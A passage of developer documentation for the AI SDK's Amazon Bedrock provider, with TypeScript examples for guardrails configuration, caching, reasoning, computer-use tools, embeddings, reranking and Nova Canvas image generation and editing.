  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Amazon Bedrock language models can also be used in the streamText function (see AI SDK Core).

File Inputs

The Amazon Bedrock provider supports file inputs, e.g. PDF files.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('anthropic.claude-3-haiku-20240307-v1:0'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe the pdf in detail.' },
        {
          type: 'file',
          data: readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

Guardrails

You can use the bedrock provider options to utilize Amazon Bedrock Guardrails:

import { type AmazonBedrockLanguageModelOptions } from '@ai-sdk/amazon-bedrock';

const result = await generateText({
  model: bedrock('anthropic.claude-3-sonnet-20240229-v1:0'),
  prompt: 'Write a story about space exploration.',
  providerOptions: {
    bedrock: {
      guardrailConfig: {
        guardrailIdentifier: '1abcd2ef34gh',
        guardrailVersion: '1',
        trace: 'enabled' as const,
        streamProcessingMode: 'async',
      },
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

Tracing information will be returned in the provider metadata if you have tracing enabled.

if (result.providerMetadata?.bedrock.trace) {
  // ...
}

See the Amazon Bedrock Guardrails documentation for more information.

Citations

Amazon Bedrock supports citations for document-based inputs across compatible models. When enabled:

Some models can read documents with visual understanding, not just extracting text
Models can cite specific parts of documents you provide, making it easier to trace information back to its source (Not Supported Yet)

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText, Output } from 'ai';
import { z } from 'zod';
import fs from 'fs';

const result = await generateText({
  model: bedrock('apac.anthropic.claude-sonnet-4-20250514-v1:0'),
  output: Output.object({
    schema: z.object({
      summary: z.string().describe('Summary of the PDF document'),
      keyPoints: z.array(z.string()).describe('Key points from the PDF'),
    }),
  }),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Summarize this PDF and provide key points.',
        },
        {
          type: 'file',
          data: readFileSync('./document.pdf'),
          mediaType: 'application/pdf',
          providerOptions: {
            bedrock: {
              citations: { enabled: true },
            },
          },
        },
      ],
    },
  ],
});

console.log('Response:', result.output);

Cache Points

providerOptions: {
  bedrock: { cachePoint: { type: 'default', ttl: '1h' } },
}

Cache usage information is returned in the providerMetadata object. See examples below.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const cyberpunkAnalysis =
  '... literary analysis of cyberpunk themes and concepts ...';

const result = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  messages: [
    {
      role: 'system',
      content: `You are an expert on William Gibson's cyberpunk literature and themes. You have access to the following academic analysis: ${cyberpunkAnalysis}`,
      providerOptions: {
        bedrock: { cachePoint: { type: 'default' } },
      },
    },
    {
      role: 'user',
      content:
        'What are the key cyberpunk themes that Gibson explores in Neuromancer?',
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.bedrock?.usage);
// Shows cache read/write token usage, e.g.:
// {
//   cacheReadInputTokens: 1337,
//   cacheWriteInputTokens: 42,
// }

Cache points also work with streaming responses:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';

const cyberpunkAnalysis =
  '... literary analysis of cyberpunk themes and concepts ...';

const result = streamText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  messages: [
    {
      role: 'assistant',
      content: [
        { type: 'text', text: 'You are an expert on cyberpunk literature.' },
        { type: 'text', text: `Academic analysis: ${cyberpunkAnalysis}` },
      ],
      providerOptions: { bedrock: { cachePoint: { type: 'default' } } },
    },
    {
      role: 'user',
      content:
        'How does Gibson explore the relationship between humanity and technology?',
    },
  ],
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log(
  'Cache token usage:',
  (await result.providerMetadata)?.bedrock?.usage,
);
// Shows cache read/write token usage, e.g.:
// {
//   cacheReadInputTokens: 1337,
//   cacheWriteInputTokens: 42,
// }

Provider Metadata

The following Bedrock-specific metadata may be returned in providerMetadata.bedrock:

trace (optional) Guardrail tracing information (when tracing is enabled).
performanceConfig (optional) Performance configuration, e.g. { latency: 'optimized' }.
serviceTier (optional) Service tier information, e.g. { type: 'on-demand' }.
usage (optional) Cache token usage details including cacheWriteInputTokens and cacheDetails.
stopSequence string | null The stop sequence that triggered the stop, if any.

Reasoning

Amazon Bedrock supports model creator-specific reasoning features:

Anthropic (e.g. claude-sonnet-4-5-20250929): enable via the reasoningConfig provider option and specifying a thinking budget in tokens (minimum: 1024, maximum: 64000).
Amazon (e.g. us.amazon.nova-2-lite-v1:0): enable via the reasoningConfig provider option and specifying a maximum reasoning effort level ('low' | 'medium' | 'high').

import {
  bedrock,
  type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

// Anthropic example
const anthropicResult = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    bedrock: {
      reasoningConfig: { type: 'enabled', budgetTokens: 1024 },
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

console.log(anthropicResult.reasoningText); // reasoning text
console.log(anthropicResult.text); // text response

// Nova 2 example
const amazonResult = await generateText({
  model: bedrock('us.amazon.nova-2-lite-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    bedrock: {
      reasoningConfig: { type: 'enabled', maxReasoningEffort: 'medium' },
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

console.log(amazonResult.reasoningText); // reasoning text
console.log(amazonResult.text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Service Tiers

Amazon Bedrock supports selecting an inference service tier per request via the serviceTier provider option.

import {
  bedrock,
  type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
  prompt: 'Summarize this support ticket backlog.',
  providerOptions: {
    bedrock: {
      serviceTier: 'priority',
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

Supported values are:

reserved
priority
default
flex

See the Amazon Bedrock service tiers documentation for model availability and behavior.

Extended Context Window

Claude Sonnet 4 models on Amazon Bedrock support an extended context window of up to 1 million tokens when using the context-1m-2025-08-07 beta feature.

import {
  bedrock,
  type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
  prompt: 'analyze this large document...',
  providerOptions: {
    bedrock: {
      anthropicBeta: ['context-1m-2025-08-07'],
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

Computer Use

Via Anthropic, Amazon Bedrock provides three provider-defined tools that can be used to interact with external systems:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.

They are available via the tools property of the provider instance.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = bedrock.tools.bash_20241022({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files.

For Claude 4 models (Opus & Sonnet):

const textEditorTool = bedrock.tools.textEditor_20250429({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    insert_text,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

For Claude 3.5 Sonnet and earlier models:

const textEditorTool = bedrock.tools.textEditor_20241022({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    insert_text,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is only available in Claude 3.5 Sonnet and earlier models.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace command.
insert_text (string, optional): Required for insert command, containing the text to insert.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.

When using the Text Editor Tool, make sure to name the key in the tools object correctly:

Claude 4 models: Use str_replace_based_edit_tool
Claude 3.5 Sonnet and earlier: Use str_replace_editor

// For Claude 4 models
const response = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
  prompt:
    "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    str_replace_based_edit_tool: textEditorTool, // Claude 4 tool name
  },
});

// For Claude 3.5 Sonnet and earlier
const response = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  prompt:
    "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    str_replace_editor: textEditorTool, // Earlier models tool name
  },
});

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = bedrock.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments

  execute: async ({ action, coordinate, text }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  toModelOutput({ output }) {
    return typeof output === 'string'
      ? [{ type: 'text', text: output }]
      : [{ type: 'image', data: output.data, mediaType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.

These tools can be used in conjunction with the anthropic.claude-3-5-sonnet-20240620-v1:0 model to enable more complex interactions and tasks.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`amazon.titan-tg1-large`
`amazon.titan-text-express-v1`
`amazon.titan-text-lite-v1`
`us.amazon.nova-premier-v1:0`
`us.amazon.nova-pro-v1:0`
`us.amazon.nova-lite-v1:0`
`us.amazon.nova-micro-v1:0`
`anthropic.claude-haiku-4-5-20251001-v1:0`
`anthropic.claude-sonnet-4-20250514-v1:0`
`anthropic.claude-sonnet-4-5-20250929-v1:0`
`anthropic.claude-opus-4-20250514-v1:0`
`anthropic.claude-opus-4-1-20250805-v1:0`
`anthropic.claude-3-5-sonnet-20241022-v2:0`
`anthropic.claude-3-5-sonnet-20240620-v1:0`
`anthropic.claude-3-opus-20240229-v1:0`
`anthropic.claude-3-sonnet-20240229-v1:0`
`anthropic.claude-3-haiku-20240307-v1:0`
`us.anthropic.claude-sonnet-4-20250514-v1:0`
`us.anthropic.claude-sonnet-4-5-20250929-v1:0`
`us.anthropic.claude-opus-4-20250514-v1:0`
`us.anthropic.claude-opus-4-1-20250805-v1:0`
`us.anthropic.claude-3-5-sonnet-20241022-v2:0`
`us.anthropic.claude-3-5-sonnet-20240620-v1:0`
`us.anthropic.claude-3-sonnet-20240229-v1:0`
`us.anthropic.claude-3-opus-20240229-v1:0`
`us.anthropic.claude-3-haiku-20240307-v1:0`
`anthropic.claude-v2`
`anthropic.claude-v2:1`
`anthropic.claude-instant-v1`
`cohere.command-text-v14`
`cohere.command-light-text-v14`
`cohere.command-r-v1:0`
`cohere.command-r-plus-v1:0`
`us.deepseek.r1-v1:0`
`meta.llama3-8b-instruct-v1:0`
`meta.llama3-70b-instruct-v1:0`
`meta.llama3-1-8b-instruct-v1:0`
`meta.llama3-1-70b-instruct-v1:0`
`meta.llama3-1-405b-instruct-v1:0`
`meta.llama3-2-1b-instruct-v1:0`
`meta.llama3-2-3b-instruct-v1:0`
`meta.llama3-2-11b-instruct-v1:0`
`meta.llama3-2-90b-instruct-v1:0`
`us.meta.llama3-2-1b-instruct-v1:0`
`us.meta.llama3-2-3b-instruct-v1:0`
`us.meta.llama3-2-11b-instruct-v1:0`
`us.meta.llama3-2-90b-instruct-v1:0`
`us.meta.llama3-1-8b-instruct-v1:0`
`us.meta.llama3-1-70b-instruct-v1:0`
`us.meta.llama3-3-70b-instruct-v1:0`
`us.meta.llama4-scout-17b-instruct-v1:0`
`us.meta.llama4-maverick-17b-instruct-v1:0`
`mistral.mistral-7b-instruct-v0:2`
`mistral.mixtral-8x7b-instruct-v0:1`
`mistral.mistral-large-2402-v1:0`
`mistral.mistral-small-2402-v1:0`
`us.mistral.pixtral-large-2502-v1:0`
`openai.gpt-oss-120b-1:0`
`openai.gpt-oss-20b-1:0`

Embedding Models

You can create models that call the Bedrock API Bedrock API using the .embedding() factory method.

const model = bedrock.embedding('amazon.titan-embed-text-v1');

Bedrock Titan embedding model amazon.titan-embed-text-v2:0 supports several additional settings. You can pass them as an options argument:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';

const model = bedrock.embedding('amazon.titan-embed-text-v2:0');

const { embedding } = await embed({
  model,
  value: 'sunny day at the beach',
  providerOptions: {
    bedrock: {
      dimensions: 512, // optional, number of dimensions for the embedding
      normalize: true, // optional, normalize the output embeddings
    } satisfies AmazonBedrockEmbeddingModelOptions,
  },
});

The following optional provider options are available for Bedrock Titan embedding models:

dimensions: number

The number of dimensions the output embeddings should have. The following values are accepted: 1024 (default), 512, 256.
normalize boolean

Flag indicating whether or not to normalize the output embeddings. Defaults to true.

Nova Embedding Models

Amazon Nova embedding models support additional provider options:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';

const { embedding } = await embed({
  model: bedrock.embedding('amazon.nova-embed-text-v2:0'),
  value: 'sunny day at the beach',
  providerOptions: {
    bedrock: {
      embeddingDimension: 1024, // optional, number of dimensions
      embeddingPurpose: 'TEXT_RETRIEVAL', // optional, purpose of embedding
      truncate: 'END', // optional, truncation behavior
    } satisfies AmazonBedrockEmbeddingModelOptions,
  },
});

The following optional provider options are available for Nova embedding models:

embeddingDimension number

The number of dimensions for the output embeddings. Supported values: 256, 384, 1024 (default), 3072.
embeddingPurpose string

The purpose of the embedding. Accepts: GENERIC_INDEX (default), TEXT_RETRIEVAL, IMAGE_RETRIEVAL, VIDEO_RETRIEVAL, DOCUMENT_RETRIEVAL, AUDIO_RETRIEVAL, GENERIC_RETRIEVAL, CLASSIFICATION, CLUSTERING.
truncate string

Truncation behavior when input exceeds the model's context length. Accepts: NONE, START, END (default).

Cohere Embedding Models

Cohere embedding models on Bedrock require an inputType and support truncation:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';

const { embedding } = await embed({
  model: bedrock.embedding('cohere.embed-english-v3'),
  value: 'sunny day at the beach',
  providerOptions: {
    bedrock: {
      inputType: 'search_document', // required for Cohere
      truncate: 'END', // optional, truncation behavior
    } satisfies AmazonBedrockEmbeddingModelOptions,
  },
});

The following provider options are available for Cohere embedding models:

inputType string

Input type for Cohere embedding models. Accepts: search_document, search_query (default), classification, clustering.
truncate string

Truncation behavior when input exceeds the model's context length. Accepts: NONE, START, END.

Model Capabilities

Model	Default Dimensions	Custom Dimensions
`amazon.titan-embed-text-v1`	1536
`amazon.titan-embed-text-v2:0`	1024
`amazon.nova-embed-text-v2:0`	1024
`cohere.embed-english-v3`	1024
`cohere.embed-multilingual-v3`	1024

Reranking Models

You can create models that call the Bedrock Rerank API using the .reranking() factory method.

const model = bedrock.reranking('cohere.rerank-v3-5:0');

You can use Amazon Bedrock reranking models to rerank documents with the rerank function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { rerank } from 'ai';

const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];

const { ranking } = await rerank({
  model: bedrock.reranking('cohere.rerank-v3-5:0'),
  documents,
  query: 'talk about rain',
  topN: 2,
});

console.log(ranking);
// [
//   { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
//   { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]

Amazon Bedrock reranking models support additional provider options that can be passed via providerOptions.bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: bedrock.reranking('cohere.rerank-v3-5:0'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  providerOptions: {
    bedrock: {
      nextToken: 'pagination_token_here',
    },
  },
});

The following provider options are available:

nextToken string

Token for pagination of results.
additionalModelRequestFields Record<string, unknown>

Additional model-specific request fields.

Model Capabilities

Model
`amazon.rerank-v1:0`
`cohere.rerank-v3-5:0`

Image Models

You can create models that call the Bedrock API Bedrock API using the .image() factory method.

For more on the Amazon Nova Canvas image model, see the Nova Canvas Overview.

const model = bedrock.image('amazon.nova-canvas-v1:0');

You can then generate images with the generateImage function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
});

You can also pass the providerOptions object to the generateImage function to customize the generation behavior:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
  providerOptions: {
    bedrock: {
      quality: 'premium',
      negativeText: 'blurry, low quality',
      cfgScale: 7.5,
      style: 'PHOTOREALISM',
    },
  },
});

The following optional provider options are available for Amazon Nova Canvas:

quality string

The quality level for image generation. Accepts 'standard' or 'premium'.
negativeText string

Text describing what you don't want in the generated image.
cfgScale number

Controls how closely the generated image adheres to the prompt. Higher values result in images that are more closely aligned to the prompt.
style string

Predefined visual style for image generation. Accepts one of: 3D_ANIMATED_FAMILY_FILM · DESIGN_SKETCH · FLAT_VECTOR_ILLUSTRATION · GRAPHIC_NOVEL_ILLUSTRATION · MAXIMALISM · MIDCENTURY_RETRO · PHOTOREALISM · SOFT_DIGITAL_PAINTING.

Documentation for additional settings can be found within the Amazon Bedrock User Guide for Amazon Nova Documentation.

Image Editing

Image Variation

Create variations of an existing image while maintaining its core characteristics:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    text: 'Modernize the style, photo-realistic, 8k, hdr',
    images: [imageBuffer],
  },
  providerOptions: {
    bedrock: {
      taskType: 'IMAGE_VARIATION',
      similarityStrength: 0.7, // 0-1, higher = closer to original
      negativeText: 'bad quality, low resolution',
    },
  },
});

similarityStrength number

Controls how similar the output is to the input image. Values range from 0 to 1, where higher values produce results closer to the original.

Inpainting

Edit specific parts of an image. You can define the area to modify using either a mask image or a text prompt:

Using a mask prompt (text-based selection):

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    text: 'a cute corgi dog in the same style',
    images: [imageBuffer],
  },
  providerOptions: {
    bedrock: {
      maskPrompt: 'cat', // Describe what to replace
    },
  },
  seed: 42,
});

Using a mask image:

const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // White pixels = area to change

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask: mask,
  },
});

maskPrompt string

A text description of the area to modify. The model will automatically identify and mask the described region.

Outpainting

Extend an image beyond its original boundaries:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    text: 'A beautiful sunset landscape with mountains',
    images: [imageBuffer],
  },
  providerOptions: {
    bedrock: {
      taskType: 'OUTPAINTING',
      maskPrompt: 'background',
      outPaintingMode: 'DEFAULT', // or 'PRECISE'
    },
  },
});

outPaintingMode string

Controls how the outpainting is performed. Accepts 'DEFAULT' or 'PRECISE'.

Background Removal

Remove the background from an image:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    images: [imageBuffer],
  },
  providerOptions: {
    bedrock: {
      taskType: 'BACKGROUND_REMOVAL',
    },
  },
});

Image Editing Provider Options

The following additional provider options are available for image editing:

taskType string

Explicitly set the editing task type. Accepts 'TEXT_IMAGE' (default for text-only), 'IMAGE_VARIATION', 'INPAINTING', 'OUTPAINTING', or 'BACKGROUND_REMOVAL'. When images are provided without an explicit taskType, the model defaults to 'IMAGE_VARIATION' (or 'INPAINTING' if a mask is provided).
maskPrompt string

Text description of the area to modify (for inpainting/outpainting). Alternative to providing a mask image.
similarityStrength number

For IMAGE_VARIATION: Controls similarity to the original (0-1).
outPaintingMode string

For OUTPAINTING: Controls the outpainting behavior ('DEFAULT' or 'PRECISE').

Image Model Settings

You can customize the generation behavior with optional options:

await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
  maxImagesPerCall: 1, // Maximum number of images to generate per API call
});

maxImagesPerCall number

Override the maximum number of images generated per API call. Default can vary by model, with 5 as a common default.

Model Capabilities

The Amazon Nova Canvas model supports custom sizes with constraints as follows:

Each side must be between 320-4096 pixels, inclusive.
Each side must be evenly divisible by 16.
The aspect ratio must be between 1:4 and 4:1. That is, one side can't be more than 4 times longer than the other side.
The total pixel count must be less than 4,194,304.

For more, see Image generation access and usage.

Model	Sizes
`amazon.nova-canvas-v1:0`	Custom sizes: 320-4096px per side (must be divisible by 16), aspect ratio 1:4 to 4:1, max 4.2M pixels

Response Headers

The Amazon Bedrock provider will return the response headers associated with network requests made of the Bedrock servers.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

console.log(result.response.headers);

Below is sample output where you can see the x-amzn-requestid header. This can be useful for correlating Bedrock API calls with requests made by the AI SDK:

{
  connection: 'keep-alive',
  'content-length': '2399',
  'content-type': 'application/json',
  date: 'Fri, 07 Feb 2025 04:28:30 GMT',
  'x-amzn-requestid': 'c9f3ace4-dd5d-49e5-9807-39aedfa47c8e'
}

This information is also available with streamText:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';

const result = streamText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}
console.log('Response headers:', (await result.response).headers);

With sample output as:

{
  connection: 'keep-alive',
  'content-type': 'application/vnd.amazon.eventstream',
  date: 'Fri, 07 Feb 2025 04:33:37 GMT',
  'transfer-encoding': 'chunked',
  'x-amzn-requestid': 'a976e3fc-0e45-4241-9954-b9bdd80ab407'
}

Bedrock Anthropic Provider Usage

For more information on Claude models available on Amazon Bedrock, see Claude on Amazon Bedrock.

Provider Instance

You can import the default provider instance bedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic:

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';

If you need a customized setup, you can import createBedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic and create a provider instance with your settings:

import { createBedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';

const bedrockAnthropic = createBedrockAnthropic({
  region: 'us-east-1', // optional
  accessKeyId: 'xxxxxxxxx', // optional
  secretAccessKey: 'xxxxxxxxx', // optional
  sessionToken: 'xxxxxxxxx', // optional
});

Provider Settings

You can use the following optional settings to customize the Bedrock Anthropic provider instance:

region string

The AWS region that you want to use for the API calls. It uses the AWS_REGION environment variable by default.
accessKeyId string

The AWS access key ID that you want to use for the API calls. It uses the AWS_ACCESS_KEY_ID environment variable by default.
secretAccessKey string

The AWS secret access key that you want to use for the API calls. It uses the AWS_SECRET_ACCESS_KEY environment variable by default.
sessionToken string

Optional. The AWS session token that you want to use for the API calls. It uses the AWS_SESSION_TOKEN environment variable by default.
apiKey string

API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the AWS_BEARER_TOKEN_BEDROCK environment variable by default.
baseURL string

Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
credentialProvider () => PromiseLike<BedrockCredentials>

The AWS credential provider to use for the Bedrock provider to get dynamic credentials similar to the AWS SDK. Setting a provider here will cause its credential values to be used instead of the accessKeyId, secretAccessKey, and sessionToken settings.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. us.anthropic.claude-3-5-sonnet-20241022-v2:0.

const model = bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0');

You can use Bedrock Anthropic language models to generate text with the generateText function:

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Provider Options

The following optional provider options are available for Bedrock Anthropic models:

metadata object

Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user.

Cache Control

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  messages: [
    {
      role: 'system',
      content: 'You are an expert assistant.',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'user',
      content: 'Explain quantum computing.',
    },
  ],
});

Computer Use

The Bedrock Anthropic provider supports Anthropic's computer use tools:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.

They are available via the tools property of the provider instance.

Bash Tool

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, isStepCount } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  tools: {
    bash: bedrockAnthropic.tools.bash_20241022({
      execute: async ({ command }) => {
        // Implement your bash command execution logic here
        return [{ type: 'text', text: `Executed: ${command}` }];
      },
    }),
  },
  prompt: 'List the files in my directory.',
  stopWhen: isStepCount(2),
});

Text Editor Tool

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, isStepCount } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  tools: {
    str_replace_editor: bedrockAnthropic.tools.textEditor_20241022({
      execute: async ({ command, path, old_str, new_str, insert_text }) => {
        // Implement your text editing logic here
        return 'File updated successfully';
      },
    }),
  },
  prompt: 'Update my README file.',
  stopWhen: isStepCount(5),
});

Computer Tool

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, isStepCount } from 'ai';
import fs from 'fs';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  tools: {
    computer: bedrockAnthropic.tools.computer_20241022({
      displayWidthPx: 1024,
      displayHeightPx: 768,
      execute: async ({ action, coordinate, text }) => {
        if (action === 'screenshot') {
          return {
            type: 'image',
            data: fs.readFileSync('./screenshot.png').toString('base64'),
          };
        }
        return `executed ${action}`;
      },
      toModelOutput({ output }) {
        return {
          type: 'content',
          value: [
            typeof output === 'string'
              ? { type: 'text', text: output }
              : {
                  type: 'image-data',
                  data: output.data,
                  mediaType: 'image/png',
                },
          ],
        };
      },
    }),
  },
  prompt: 'Take a screenshot.',
  stopWhen: isStepCount(3),
});

Reasoning

Anthropic has reasoning support for Claude 3.7 and Claude 4 models on Bedrock, including:

us.anthropic.claude-opus-4-7
us.anthropic.claude-opus-4-6-v1
us.anthropic.claude-opus-4-5-20251101-v1:0
us.anthropic.claude-sonnet-4-5-20250929-v1:0
us.anthropic.claude-opus-4-20250514-v1:0
us.anthropic.claude-sonnet-4-20250514-v1:0
us.anthropic.claude-opus-4-1-20250805-v1:0
us.anthropic.claude-haiku-4-5-20251001-v1:0

You can enable it using the thinking provider option and specifying a thinking budget in tokens.

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
